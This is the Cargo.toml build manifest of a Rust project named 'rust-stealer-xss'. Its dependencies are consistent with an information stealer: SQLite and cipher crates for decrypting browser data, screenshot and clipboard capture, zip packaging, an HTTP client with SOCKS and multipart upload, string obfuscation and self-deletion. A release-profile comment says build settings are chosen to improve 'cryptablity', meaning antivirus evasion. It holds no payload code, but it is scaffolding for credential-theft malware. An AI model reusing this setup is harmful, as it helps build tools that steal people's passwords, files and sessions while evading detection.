[package]
name = "rust-stealer-xss"
version = "0.1.0"
edition = "2021"

[dependencies]
rusqlite = { version = "0.28.0", features = ["bundled"]}
aes-gcm = "0.9.4"
serde = { version = "1.0.138", features = ["derive"] }
serde_json = "1.0.82"
base64 = "0.13.0"
globwalk = "0.8.1"
walkdir = "2"
zip = "0.6.1"
zip-extensions = "0.6.1"
screenshots = "0.3.1"
tokio = { version = "1", features = ["macros", "fs", "rt-multi-thread", "rt"] }
wmi = "0.11.4"
regex = "1.6.0"
der-parser = "8.1.0"
ring = "0.16"
aes = "0.6.0"
block-modes = "0.7.0"
sha1 = "0.6.0"
des = "0.6.0"
obfstr = "0.4.0"
once_cell = "1.13.0"
houdini = "1.0.2"
reqwest = { version = "0.11.0", features = ["json", "multipart", "blocking", "socks"]}
rand = "0.8.5"
clipboard-win = "4.5.0"
roxmltree = "0.14.1"
image = "*"
lazy_static = "1.4.0"
xml = "0.8.10"
winapi = "0.3.9"

[dependencies.windows]
version = "0.51"
features = [
"Win32_Security_Cryptography", 
"Win32_Foundation", 
"Win32_System_Threading",
"Win32_System_RestartManager",
"Win32_System_LibraryLoader",
]


[profile.release] # optimize file size 
lto = true
codegen-units = 3 # use 3 instead of 1 to improve cryptablity
opt-level = "s"
panic = "abort"
strip = true
